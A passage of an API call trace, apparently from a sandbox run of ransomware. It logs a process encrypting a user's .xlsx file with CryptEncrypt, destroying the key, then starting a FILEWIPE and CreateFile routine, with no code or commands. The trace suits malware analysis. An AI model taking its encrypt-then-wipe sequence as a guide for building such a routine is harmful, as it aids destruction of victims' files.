Size=0x10) returned 0x9bd4e0 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0170.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0170.612] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0170.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0170.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0170.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0170.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0170.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0170.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.615] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27b8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27b8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0170.615] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.615] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.616] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.616] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.616] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.616] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.616] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.617] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa915, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa920) returned 1 [0170.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.618] CharLowerBuffW (in: lpsz="byte[43297]", cchLength=0xb | out: lpsz="byte[43297]") returned 0xb [0170.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.619] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.620] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ea3c8*, pdwDataLen=0x87e820*=0xa915, dwBufLen=0xa920 | out: pbData=0x9ea3c8*, pdwDataLen=0x87e820*=0xa920) returned 1 [0170.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.621] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.621] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.621] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.621] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.621] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.621] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0170.621] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.621] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.621] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.624] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.624] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.624] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.629] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0170.629] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.629] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0170.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.629] CryptDestroyKey (hKey=0x90aed8) returned 1 [0170.632] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.632] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.632] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.632] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.632] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.632] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.632] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.632] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.632] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.633] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.633] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0170.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.633] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0170.633] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.633] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0170.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.633] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0170.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.634] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0170.634] FreeLibrary (hLibModule=0x74f20000) returned 1 [0170.634] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.634] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.636] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.638] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0170.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0x290dce00, ftLastWriteTime.dwHighDateTime=0x1d5aa6f, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 0x90af58 [0170.639] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0170.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.640] CharLowerBuffW (in: lpsz="byte[43285]", cchLength=0xb | out: lpsz="byte[43285]") returned 0xb [0170.640] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.640] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0170.640] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.641] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0170.641] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0170.641] FreeLibrary (hLibModule=0x75c90000) returned 1 [0170.641] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.641] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.641] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 